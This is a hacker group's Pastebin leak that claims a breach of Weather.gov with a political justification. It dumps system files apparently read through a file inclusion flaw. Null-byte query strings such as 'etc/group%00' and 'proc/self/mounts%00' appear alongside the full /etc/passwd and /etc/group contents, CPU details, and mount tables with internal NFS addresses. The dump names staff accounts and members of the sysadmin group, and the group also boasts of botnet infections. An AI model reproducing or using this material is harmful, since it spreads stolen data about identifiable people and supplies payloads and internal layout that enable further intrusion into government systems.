Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Weather.Gov Data leaked by Kosova Hacker's Security
- Months ago in the American media write that as Americans have in the field control cybernetics Muslim country servers. We as an organization have taken the order we receive checks in some American servers as it is one of to Weather.Gov. We do not want Americans to take control servers Muslim country .We have infected computers with botnets very few organizations that deal with anti-Muslim purposes. We will soon publish the many other things the U.S. government and we will never stop year after year . This is our mission .
- Kosova Hacker's Security
- http://img577.imageshack.us/img577/70/30c8d92162864d4d9cc2d32.png
- http://img7.imageshack.us/img7/3247/2fddef2d32974cadb73e3aa.png
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: etc/group%00</b>root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- disk:x:6:root
- lp:x:7:daemon,lp
- mem:x:8:
- kmem:x:9:
- wheel:x:10:root
- mail:x:12:mail,postfix
- uucp:x:14:uucp
- man:x:15:
- games:x:20:
- gopher:x:30:
- video:x:39:
- dip:x:40:
- ftp:x:50:
- lock:x:54:
- audio:x:63:
- nobody:x:99:
- users:x:100:
- dbus:x:81:
- utmp:x:22:
- utempter:x:35:
- floppy:x:19:
- vcsa:x:69:
- rpc:x:32:
- abrt:x:499:
- cdrom:x:11:
- tape:x:33:
- dialout:x:18:
- saslauth:x:498:
- mailnull:x:47:
- smmsp:x:51:
- haldaemon:x:68:haldaemon
- ntp:x:38:
- rpcuser:x:29:
- nfsnobody:x:65534:
- apache:x:48:
- webalizer:x:67:
- sshd:x:74:
- postdrop:x:90:
- postfix:x:89:
- tcpdump:x:72:
- slocate:x:21:
- stapdev:x:497:
- stapusr:x:496:
- sysadmin:x:401:cmccan,kmars,darnold,mstrydom,nscanner
- cmccan:x:500:
- darnold:x:501:
- kmars:x:503:
- zabbix:x:309:
- clamav:x:311:
- clamupdate:x:312:
- clam:x:308:
- cgred:x:504:
- mstrydom:x:533:
- forecast:x:302:
- ahps:x:303:
- nwschat:x:320:
- nscanner:x:424:
- memcached:x:301:
- stapsys:x:157:
- <b>Query Used: proc/cpuinfo%00</b>processor : 0
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 0
- cpu cores : 6
- apicid : 32
- initial apicid : 32
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 1
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 0
- cpu cores : 6
- apicid : 0
- initial apicid : 0
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 2
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 1
- cpu cores : 6
- apicid : 34
- initial apicid : 34
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 3
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 1
- cpu cores : 6
- apicid : 2
- initial apicid : 2
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 4
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 2
- cpu cores : 6
- apicid : 36
- initial apicid : 36
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 5
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 2
- cpu cores : 6
- apicid : 4
- initial apicid : 4
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 6
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 8
- cpu cores : 6
- apicid : 48
- initial apicid : 48
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 7
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 8
- cpu cores : 6
- apicid : 16
- initial apicid : 16
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 8
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 9
- cpu cores : 6
- apicid : 50
- initial apicid : 50
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 9
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 9
- cpu cores : 6
- apicid : 18
- initial apicid : 18
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 10
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 10
- cpu cores : 6
- apicid : 52
- initial apicid : 52
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 11
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 10
- cpu cores : 6
- apicid : 20
- initial apicid : 20
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 12
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 0
- cpu cores : 6
- apicid : 33
- initial apicid : 33
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 13
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 0
- cpu cores : 6
- apicid : 1
- initial apicid : 1
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 14
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 1
- cpu cores : 6
- apicid : 35
- initial apicid : 35
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 15
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 1
- cpu cores : 6
- apicid : 3
- initial apicid : 3
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 16
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 2
- cpu cores : 6
- apicid : 37
- initial apicid : 37
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 17
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 2
- cpu cores : 6
- apicid : 5
- initial apicid : 5
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 18
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 8
- cpu cores : 6
- apicid : 49
- initial apicid : 49
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 19
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 8
- cpu cores : 6
- apicid : 17
- initial apicid : 17
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 20
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 9
- cpu cores : 6
- apicid : 51
- initial apicid : 51
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 21
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 9
- cpu cores : 6
- apicid : 19
- initial apicid : 19
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 22
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 1
- siblings : 12
- core id : 10
- cpu cores : 6
- apicid : 53
- initial apicid : 53
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5320.36
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- power management:
- processor : 23
- vendor_id : GenuineIntel
- cpu family : 6
- model : 44
- model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
- stepping : 2
- cpu MHz : 2660.180
- cache size : 12288 KB
- physical id : 0
- siblings : 12
- core id : 10
- cpu cores : 6
- apicid : 21
- initial apicid : 21
- fpu : yes
- fpu_exception : yes
- cpuid level : 11
- wp : yes
- flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
- bogomips : 5319.81
- clflush size : 64
- cache_alignment : 64
- address sizes : 40 bits physical, 48 bits virtual
- <b>Query Used: proc/self/mounts%00</b>rootfs / rootfs rw 0 0
- proc /proc proc rw,relatime 0 0
- sysfs /sys sysfs rw,seclabel,relatime 0 0
- devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
- devpts /dev/pts devpts rw,seclabel,relatime,gid=5,mode=620,ptmxmode=000 0 0
- tmpfs /dev/shm tmpfs rw,seclabel,relatime 0 0
- /dev/mapper/VolGroup00-LogVol01 / ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
- none /selinux selinuxfs rw,relatime 0 0
- devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
- /proc/bus/usb /proc/bus/usb usbfs rw,relatime 0 0
- /dev/sda1 /boot ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
- none /proc/sys/fs/binfmt_misc binfmt_misc rw,relatime 0 0
- sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
- netdata2nfs:/vol/www /www nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
